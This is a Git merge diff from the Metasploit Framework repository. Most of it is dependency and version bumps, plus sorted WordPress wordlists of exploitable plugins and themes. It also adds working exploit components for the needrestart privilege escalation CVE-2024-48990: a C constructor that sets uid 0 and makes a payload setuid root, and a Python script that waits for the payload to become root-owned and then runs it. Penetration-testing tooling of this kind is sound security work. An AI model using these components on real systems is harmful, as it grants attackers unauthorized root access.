Merge branch 'rapid7:master' into linqpad_deserialization

Author: msutovsky-r7

.github/workflows/verify.yml

@@ -63,7 +63,7 @@ jobs:
           - '3.1'
           - '3.2'
           - '3.3'
-          - '3.4.0-preview2'
+          - '3.4'
         os:
           - ubuntu-20.04
           - ubuntu-latest

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.43)
+    metasploit-framework (6.4.47)
       aarch64
       abbrev
       actionpack (~> 7.0.0)
@@ -15,10 +15,12 @@ PATH
       base64
       bcrypt
       bcrypt_pbkdf
+      benchmark
       bigdecimal
       bootsnap
       bson
       chunky_png
+      concurrent-ruby (= 1.3.4)
       csv
       dnsruby
       drb
@@ -31,6 +33,7 @@ PATH
       faraday-retry
       faye-websocket
       ffi (< 1.17.0)
+      fiddle
       filesize
       getoptlong
       hrr_rb_ssh-ed25519
@@ -60,6 +63,7 @@ PATH
       octokit (~> 4.0)
       openssl-ccm
       openvas-omp
+      ostruct
       packetfu
       patch_finder
       pcaprub
@@ -186,6 +190,7 @@ GEM
     base64 (0.2.0)
     bcrypt (3.1.20)
     bcrypt_pbkdf (1.1.1)
+    benchmark (0.4.0)
     bigdecimal (3.1.8)
     bindata (2.4.15)
     bootsnap (1.18.4)
@@ -200,7 +205,7 @@ GEM
     crass (1.0.6)
     csv (3.3.0)
     daemons (1.4.1)
-    date (3.3.4)
+    date (3.4.1)
     debug (1.8.0)
       irb (>= 1.5.0)
       reline (>= 0.3.1)
@@ -242,6 +247,7 @@ GEM
       eventmachine (>= 0.12.0)
       websocket-driver (>= 0.5.1)
     ffi (1.16.3)
+    fiddle (1.1.6)
     filesize (0.2.0)
     fivemat (1.3.7)
     getoptlong (0.2.1)
@@ -351,6 +357,7 @@ GEM
     openssl-ccm (1.2.3)
     openssl-cmac (2.0.2)
     openvas-omp (0.0.4)
+    ostruct (0.6.1)
     packetfu (2.0.0)
       pcaprub (~> 0.13.1)
     parallel (1.26.3)
@@ -446,7 +453,8 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.57)
+    rex-socket (0.1.58)
+      dnsruby
       rex-core
     rex-sslscan (0.1.10)
       rex-core

LICENSE_GEMS

@@ -26,6 +26,7 @@ aws-sigv4, 1.10.1, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
+benchmark, 0.4.0, "ruby, Simplified BSD"
 bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
@@ -40,7 +41,7 @@ cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.4, "ruby, Simplified BSD"
+date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
 dnsruby, 1.72.2, "Apache 2.0"
@@ -61,6 +62,7 @@ faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 getoptlong, 0.2.1, "ruby, Simplified BSD"
@@ -88,7 +90,7 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.3, "New BSD"
 metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.43, "New BSD"
+metasploit-framework, 6.4.47, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.5, "New BSD"
@@ -119,6 +121,7 @@ octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.26.3, MIT
 parser, 3.3.5.0, MIT
@@ -159,7 +162,7 @@ rex-powershell, 0.1.100, "New BSD"
 rex-random_identifier, 0.1.13, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.57, "New BSD"
+rex-socket, 0.1.58, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
 rex-text, 0.2.59, "New BSD"

data/exploits/CVE-2024-48990/lib.metasm

@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}

data/exploits/CVE-2024-48990/sleeper.py

@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)

data/wordlists/wp-exploitable-plugins.txt

@@ -1,71 +1,70 @@
-wordpress-popular-posts
+ajax-load-more
+all-in-one-wp-migration
 backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
 catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
+chopslider
+custom-registration-form-builder-with-submission-manager
+download-manager
 drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
+dukapress
 duplicator
-work-the-flow-file-upload
-ajax-load-more
-wpdiscuz
-wptouch
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
 front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
-download-manager
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
-photo-gallery
-pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
-wp-automatic
-wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
 learnpress
-wp-mobile-edition
-boldgrid-backup
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
 modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
 nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
+photo-gallery
+pie-register
+plainview-activity-monitor
+post-smtp
+really-simple-ssl
+reflex-gallery
+royal-elementor-addons
+secure-copy-content-protection
+sexy-contact-form
 simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
 subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
+ultimate-member
+website-contact-form-with-file-upload
 woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
 woocommerce-payments
-file-manager-advanced-shortcode
-royal-elementor-addons
-backup-backup
-hash-form
-give
-ultimate-member
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
+wp-automatic
+wp-easycart
 wp-fastest-cache
-post-smtp
-really-simple-ssl
-perfect-survey
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
+wp-mobile-edition
+wp-symposium
+wp-symposium
 wp-time-capsule
+wp-ultimate-csv-importer
+wpdiscuz
+wps-hide-login
+wpshop
+wptouch
+wysija-newsletters

data/wordlists/wp-exploitable-themes.txt

@@ -1,3 +1,3 @@
+bricks
 holding_pattern
 wplms
-bricks